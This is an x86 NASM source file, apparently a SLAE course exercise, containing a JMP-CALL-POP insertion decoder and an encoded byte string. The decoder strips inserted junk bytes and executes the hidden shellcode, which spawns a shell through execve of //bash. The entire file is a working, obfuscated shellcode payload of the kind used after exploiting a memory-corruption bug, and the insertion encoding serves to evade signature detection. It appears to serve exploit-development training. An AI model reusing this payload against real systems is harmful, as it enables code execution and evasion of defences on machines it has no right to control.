; Filename: insertion-decoder.nasm
; Author:  H4554n AlMusajjen
; Website:  https://h4554nalmusajjen.wordpress.com/
;SLAE - 1057


global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +6]
	xor eax, eax
	mov al, 6
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0x70
	jnz short var1
	xor ecx, ecx
	mov ecx, 6
shifting:
	mov bl, byte [esi + eax + 4]
	mov byte [edi], bl
	inc edi
	inc eax
	loop shifting
	sub ax,6	
	add ax,10
	jmp short decode	



call_shellcode:
	call decoder
	var1: db 0x31,0xc0,0x50,0x68,0x2f,0x2f,0x70,0x75,0x74,0x61,0x73,0x68,0x68,0x2f,0x62,0x69,0x70,0x75,0x74,0x61,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x70,0x75,0x74,0x61,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x70,0x75,0x74,0x61,0x80,0x90,0x90,0x90,0x90,0x90
